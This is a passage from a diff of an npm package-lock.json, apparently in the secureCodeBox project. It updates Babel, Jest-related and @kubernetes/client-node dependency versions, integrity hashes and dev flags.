"sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", + "dev": true, "requires": { - "@babel/helper-validator-identifier": "^7.25.9", + "@babel/helper-validator-identifier": "^7.27.1", "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" + "picocolors": "^1.1.1" } }, "@babel/compat-data": { "version": "7.26.2", "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==" + "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", + "dev": true }, "@babel/core": { "version": "7.26.0", "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", + "dev": true, "requires": { "@ampproject/remapping": "^2.2.0", "@babel/code-frame": "^7.26.0", @@ -4139,6 +4356,7 @@ "version": "7.26.2", "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", + "dev": true, "requires": { "@babel/parser": "^7.26.2", "@babel/types": "^7.26.0", @@ -4151,6 +4369,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", + "dev": true, "requires": { "@babel/compat-data": "^7.25.9", "@babel/helper-validator-option": "^7.25.9", @@ -4163,6 +4382,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", + "dev": true, "requires": { "@babel/traverse": "^7.25.9", "@babel/types": "^7.25.9" @@ -4172,6 +4392,7 @@ "version": "7.26.0", "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", + "dev": true, "requires": { "@babel/helper-module-imports": "^7.25.9", "@babel/helper-validator-identifier": "^7.25.9", @@ -4181,44 +4402,51 @@ "@babel/helper-plugin-utils": { "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==" + "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", + "dev": true }, "@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==" + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.27.1.tgz", + "integrity": "sha512-qMlSxKbpRlAridDExk92nSobyDdpPijUq2DW6oDnUqd0iOGxmQjyqhMIihI9+zv4LPyZdRje2cavWPbCbWm3eA==", + "dev": true }, "@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==" + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", + "dev": true }, "@babel/helper-validator-option": { "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==" + "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", + "dev": true }, "@babel/helpers": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.0.tgz", - "integrity": "sha512-tbhNuIxNcVb21pInl3ZSjksLCvgdZy9KwJ8brv993QtIVKJBBkYXz4q4ZbAv31GdnC+R90np23L5FbEBlthAEw==", + "version": "7.27.6", + "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.27.6.tgz", + "integrity": "sha512-muE8Tt8M22638HU31A3CgfSUciwz1fhATfoVai05aPXGor//CdWDCbnlY1yvBPo07njuVOCNGCSp/GTt12lIug==", + "dev": true, "requires": { - "@babel/template": "^7.25.9", - "@babel/types": "^7.26.0" + "@babel/template": "^7.27.2", + "@babel/types": "^7.27.6" } }, "@babel/parser": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.2.tgz", - "integrity": "sha512-DWMCZH9WA4Maitz2q21SRKHo9QXZxkDsbNZoVD62gusNtNBBqDg9i7uOhASfTfIGNzW+O+r7+jAlM8dwphcJKQ==", + "version": "7.27.5", + "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.27.5.tgz", + "integrity": "sha512-OsQd175SxWkGlzbny8J3K8TnnDD0N3lrIUtB92xwyRpzaenGZhxDvxN/JgU00U3CDZNj9tPuDJ5H0WS4Nt3vKg==", + "dev": true, "requires": { - "@babel/types": "^7.26.0" + "@babel/types": "^7.27.3" } }, "@babel/plugin-syntax-async-generators": { "version": "7.8.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4227,6 +4455,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4235,6 +4464,7 @@ "version": "7.12.13", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.12.13" } @@ -4243,6 +4473,7 @@ "version": "7.10.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.10.4" } @@ -4251,6 +4482,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4259,6 +4491,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.25.9" } @@ -4267,6 +4500,7 @@ "version": "7.10.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.10.4" } @@ -4275,6 +4509,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4283,6 +4518,7 @@ "version": "7.10.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.10.4" } @@ -4291,6 +4527,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4299,6 +4536,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4307,6 +4545,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4315,6 +4554,7 @@ "version": "7.14.5", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.14.5" } @@ -4323,24 +4563,27 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.25.9" } }, "@babel/template": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.25.9.tgz", - "integrity": "sha512-9DGttpmPvIxBb/2uwpVo3dqJ+O6RooAFOS+lB+xDqoE2PVCE8nfoHMdZLpfCQRLwvohzXISPZcgxt80xLfsuwg==", + "version": "7.27.2", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.27.2.tgz", + "integrity": "sha512-LPDZ85aEJyYSd18/DkjNh4/y1ntkE5KwUHWTiqgRxruuZL2F1yuHligVHLvcHY2vMHXttKFpJn6LwfI7cw7ODw==", + "dev": true, "requires": { - "@babel/code-frame": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/types": "^7.25.9" + "@babel/code-frame": "^7.27.1", + "@babel/parser": "^7.27.2", + "@babel/types": "^7.27.1" } }, "@babel/traverse": { "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", + "dev": true, "requires": { "@babel/code-frame": "^7.25.9", "@babel/generator": "^7.25.9", @@ -4352,23 +4595,26 @@ } }, "@babel/types": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.0.tgz", - "integrity": "sha512-Z/yiTPj+lDVnF7lWeKCIJzaIkI0vYO87dMpZ4bg4TDrFe4XXLFWL1TbXU27gBP3QccxV9mZICCrnjnYlJjXHOA==", + "version": "7.27.6", + "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.27.6.tgz", + "integrity": "sha512-ETyHEk2VHHvl9b9jZP5IHPavHYk57EhanlRRuae9XCpb/j5bDCbPPMOBfCWhnl/7EDJz0jEMCi/RhccCE8r1+Q==", + "dev": true, "requires": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" + "@babel/helper-string-parser": "^7.27.1", + "@babel/helper-validator-identifier": "^7.27.1" } }, "@bcoe/v8-coverage": { "version": "0.2.3", "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==" + "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", + "dev": true }, "@istanbuljs/load-nyc-config": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", + "dev": true, "requires": { "camelcase": "^5.3.1", "find-up": "^4.1.0", @@ -4381,6 +4627,7 @@ "version": "1.0.10", "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", + "dev": true, "requires": { "sprintf-js": "~1.0.2" } @@ -4389,6 +4636,7 @@ "version": "3.14.1", "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", + "dev": true, "requires": { "argparse": "^1.0.7", "esprima": "^4.0.0" @@ -4399,12 +4647,14 @@ "@istanbuljs/schema": { "version": "0.1.3", "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==" + "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", + "dev": true }, "@jest/console": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "@types/node": "*", @@ -4418,6 +4668,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", + "dev": true, "requires": { "@jest/console": "^29.7.0", "@jest/reporters": "^29.7.0", @@ -4453,6 +4704,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", + "dev": true, "requires": { "@jest/fake-timers": "^29.7.0", "@jest/types": "^29.6.3", @@ -4464,6 +4716,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", + "dev": true, "requires": { "expect": "^29.7.0", "jest-snapshot": "^29.7.0" @@ -4473,6 +4726,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", + "dev": true, "requires": { "jest-get-type": "^29.6.3" } @@ -4481,6 +4735,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "@sinonjs/fake-timers": "^10.0.2", @@ -4494,6 +4749,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", + "dev": true, "requires": { "@jest/environment": "^29.7.0", "@jest/expect": "^29.7.0", @@ -4505,6 +4761,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", + "dev": true, "requires": { "@bcoe/v8-coverage": "^0.2.3", "@jest/console": "^29.7.0", @@ -4536,6 +4793,7 @@ "version": "6.0.3", "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", + "dev": true, "requires": { "@babel/core": "^7.23.9", "@babel/parser": "^7.23.9", @@ -4547,7 +4805,8 @@ "semver": { "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==" + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true } } }, @@ -4555,6 +4814,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", + "dev": true, "requires": { "@sinclair/typebox": "^0.27.8" } @@ -4563,6 +4823,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", + "dev": true, "requires": { "@jridgewell/trace-mapping": "^0.3.18", "callsites": "^3.0.0", @@ -4573,6 +4834,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", + "dev": true, "requires": { "@jest/console": "^29.7.0", "@jest/types": "^29.6.3", @@ -4584,6 +4846,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", + "dev": true, "requires": { "@jest/test-result": "^29.7.0", "graceful-fs": "^4.2.9", @@ -4595,6 +4858,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", + "dev": true, "requires": { "@babel/core": "^7.11.6", "@jest/types": "^29.6.3", @@ -4617,6 +4881,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", + "dev": true, "requires": { "@jest/schemas": "^29.6.3", "@types/istanbul-lib-coverage": "^2.0.0", @@ -4630,6 +4895,7 @@ "version": "0.3.5", "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", + "dev": true, "requires": { "@jridgewell/set-array": "^1.2.1", "@jridgewell/sourcemap-codec": "^1.4.10", @@ -4639,71 +4905,90 @@ "@jridgewell/resolve-uri": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==" + "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", + "dev": true }, "@jridgewell/set-array": { "version": "1.2.1", "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==" + "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", + "dev": true }, "@jridgewell/sourcemap-codec": { "version": "1.4.15", "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==" + "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", + "dev": true }, "@jridgewell/trace-mapping": { "version": "0.3.25", "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", + "dev": true, "requires": { "@jridgewell/resolve-uri": "^3.1.0", "@jridgewell/sourcemap-codec": "^1.4.14" } }, + "@jsep-plugin/assignment": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", + "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", + "dev": true, + "requires": {} + }, + "@jsep-plugin/regex": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", + "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", + "dev": true, + "requires": {} + }, "@kubernetes/client-node": { - "version": "0.19.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.19.0.tgz", - "integrity": "sha512-WTOjGuFQ8yeW3+qD6JrAYhpwpoQbe9R8cA/61WCyFrNawSTUgLstHu7EsZRYEs39er3jDn3wCEaczz+VOFlc2Q==", + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", "dev": true, "requires": { "@types/js-yaml": "^4.0.1", - "@types/node": "^20.1.1", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", "isomorphic-ws": "^5.0.0", "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "openid-client": "^5.3.0", - "request": "^2.88.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tslib": "^2.4.1", - "ws": "^8.11.0" + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, "@securecodebox/parser-sdk-nodejs": { "version": "file:../../parser-sdk/nodejs", "requires": { - "@kubernetes/client-node": "^0.22.3", + "@kubernetes/client-node": "^1.3.0", "ajv": "^8.17.1", "ajv-draft-04": "^1.0.0", "ajv-formats": "^3.0.1", - "axios": "^1.7.8", - "jsonpointer": "^5.0.1", - "ws": "^8.13.0" + "jsonpointer": "^5.0.1" } }, "@sinclair/typebox": { "version": "0.27.8", "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==" + "integrity": 